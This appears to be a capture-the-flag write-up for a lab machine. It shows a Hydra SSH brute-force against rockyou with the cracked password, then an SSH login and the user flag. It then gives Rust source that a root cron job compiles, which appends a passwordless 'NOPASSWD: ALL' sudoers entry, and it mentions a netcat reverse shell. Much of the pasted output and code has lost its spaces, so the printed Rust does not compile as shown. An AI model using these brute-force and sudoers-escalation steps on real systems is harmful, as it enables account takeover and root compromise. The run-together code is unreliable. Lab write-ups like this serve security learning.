since no http port was open, my next thought was to bruteforce the password
hydra bruteforce
└─➜ hydra -l melodi -P /usr/share/wordlists/rockyou.txt 10.10.103.104 ssh -t 4 [0]
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-10 12:37:16[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task[DATA] attacking ssh://10.10.103.104:22/[STATUS] 81.00 tries/min, 81 tries in 00:01h, 14344317 to do in 2951:31h, 4 active[22][ssh] host: 10.10.103.104 login: melodi password: princess11of1targetsuccessfullycompleted,1validpasswordfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-10 12:38:56
Password found : princess1
User flag
└─➜ ssh melodi@10.10.103.104 [130]
Theauthenticityofhost'10.10.103.104 (10.10.103.104)'can't be established.ED25519 key fingerprint is SHA256:G7f5Il1Yitj0F1y5OmeYSgwUVJbsq01WBas04KF+LPo.This host key is known by the following other names/addresses: ~/.ssh/known_hosts:36: 10.10.224.19 ~/.ssh/known_hosts:38: 10.10.211.116Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.103.104' (ED25519) to the list of known hosts.melodi@10.10.103.104'spassword:WelcometoUbuntu20.04.6LTS (GNU/Linux 5.4.0-167-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantageLastlogin:ThuDec718:33:342023melodi@ubuntu:~$lsfl4g.txtmelodi@ubuntu:~$catfl4g.txtYCTF{15_1t_e45y??}
Flag : YCTF{15_1t_e45y??}
Root flag
I used pspy64 script to see what all proccess were running on the machine
every minute root compiles the script under /tmp/hello.rs and (runs it?)
Let's add ourself in sudoers list (NOTE: this isn't the way i solved this machine)
before :
melodi@ubuntu:/tmp$sudo-l[sudo] password for melodi:Sorry,usermelodimaynotrunsudoonubuntu.
script :
use std::fs::OpenOptions;use std::io::{self, Write};use std::path::Path;fnmain() {let username ="melodi";// Path to the sudoers filelet sudoers_path ="/etc/sudoers";// Check if the file existsif!Path::new(sudoers_path).exists() {eprintln!("Error: sudoers file not found at {}", sudoers_path);return; }// Open the sudoers file for appendingletmut file =matchOpenOptions::new().append(true).open(sudoers_path) {Ok(file) => file,Err(err) => {eprintln!("Error opening sudoers file: {}", err);return; } };// Prepare the line to be added to the sudoers filelet sudoers_line =format!("{} ALL=(ALL:ALL) NOPASSWD: ALL\n", username);// Write the line to the sudoers filematch file.write_all(sudoers_line.as_bytes()) {Ok(_) =>println!("Passwordless sudo access added for user: {}", username),Err(err) =>eprintln!("Error writing to sudoers file: {}", err), }}
After a minute our script will be run by the root user
btw i used another script during CTF, a script that had rev shell payload for my local machine, i listen on my local machine with netcat and got root shell.